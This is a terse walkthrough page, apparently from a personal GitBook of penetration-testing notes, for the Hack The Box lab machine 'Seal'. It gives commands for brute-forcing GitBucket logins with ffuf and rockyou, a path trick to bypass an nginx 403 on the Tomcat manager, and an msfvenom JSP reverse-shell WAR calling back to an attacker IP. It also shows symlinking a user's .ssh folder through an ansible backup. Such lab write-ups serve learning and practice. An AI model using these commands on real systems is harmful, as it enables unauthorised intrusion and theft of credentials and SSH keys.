Notes
  • šŸ‘€About me
  • ā„¹ļøGood Reads
  • šŸŒWeb
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • šŸ“˜Windows API
    • C# - P/Invoke
  • ā˜•Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • šŸ§ƒHack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • šŸ“•TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • šŸ› ļøCheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page

Was this helpful?

  1. Hack The Box

Seal

PreviousIntelligenceNextUnder Construction

Last updated 3 years ago

Was this helpful?

  • Register a new account at gitbucket

  • Bruteforce

    ffuf -u /register/validate -X POST -d "userName=FUZZ&password=test123&fullName=test&mailAddress=test&extraMailAddresses%5B0%5D=test&extraMailAddresses%5B1%5D=&url=&description=&fileId=" -w ../userlist.txt -mr already -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Valid usernames alex root luis

ffuf -u /signin -X POST -d "userName=root&password=FUZZ&hash=" -w ../rockyou.txt -fr signin -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Remove mutual authentication, setup registration and login features

  • <user username="tomcat" password="[redacted]" roles="manager-gui,admin-gui"/>

  • Bypass nginx reverse proxy 403 [nginx -> tomcat]

    https://10.10.10.250/manager;a=b/html/ https://10.10.10.250/manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=B07EF0732BE104396355D26DD2A56CEE [upload war file]

  • msfvenom --list payloads | grep -ie war

  • msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.76 LPORT=7901 -o shell.war

  • tty shell python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Create a soft link ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/ressurect

  • ansible run.yml format: zip mode: 0777

  • ansible if being run by root, create a soft link ln -s of ssh folder and create a zip archive

----------------------------------------------------------------------- Path: ā€¢ bruteforce root login? ā€¢ edit nginx config file to bypass 403 ā€¢ bypass nginx ā€¢ upload war file on tomcat manager to gain reverse shell [root flag] ā€¢ how is registration happening at gitbucket

šŸ§ƒ
http://10.10.10.250:8080
http://10.10.10.250:8080